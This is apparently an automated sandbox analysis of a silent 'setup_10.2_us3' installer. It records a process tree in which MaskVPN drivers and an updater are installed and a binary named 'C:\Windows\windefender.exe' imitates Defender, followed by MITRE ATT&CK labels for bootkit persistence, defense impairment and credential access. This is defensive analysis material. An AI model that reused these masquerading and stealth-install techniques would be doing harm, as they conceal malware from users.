1⤵
PID:5344

C:\Users\Admin\AppData\Local\Temp\is-72J14.tmp\setup_10.2_us3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-72J14.tmp\setup_10.2_us3.tmp" /SL5="$1027E,746887,121344,C:\Users\Admin\AppData\Local\Temp\tpzo2oxt3x1\setup_10.2_us3.exe" /silent
1⤵
PID:3256

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:5392

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6424

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6800

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:7048

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:964
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{780ff469-a236-234d-8cec-f771def16b59}\oemvista.inf" "9" "4d14a44ff" "000000000000016C" "WinSta0\Default" "0000000000000174" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:4732
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
  2⤵
  PID:4992

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5252

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:6944

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:5224
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:4860

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6320

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3464

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5232

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4204

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:6440

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6232

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1288

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1680

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Scripting

T1064

Persistence

Bootkit

T1067

Modify Existing Service

T1031

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

Modify Registry

Scripting

Web Service

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery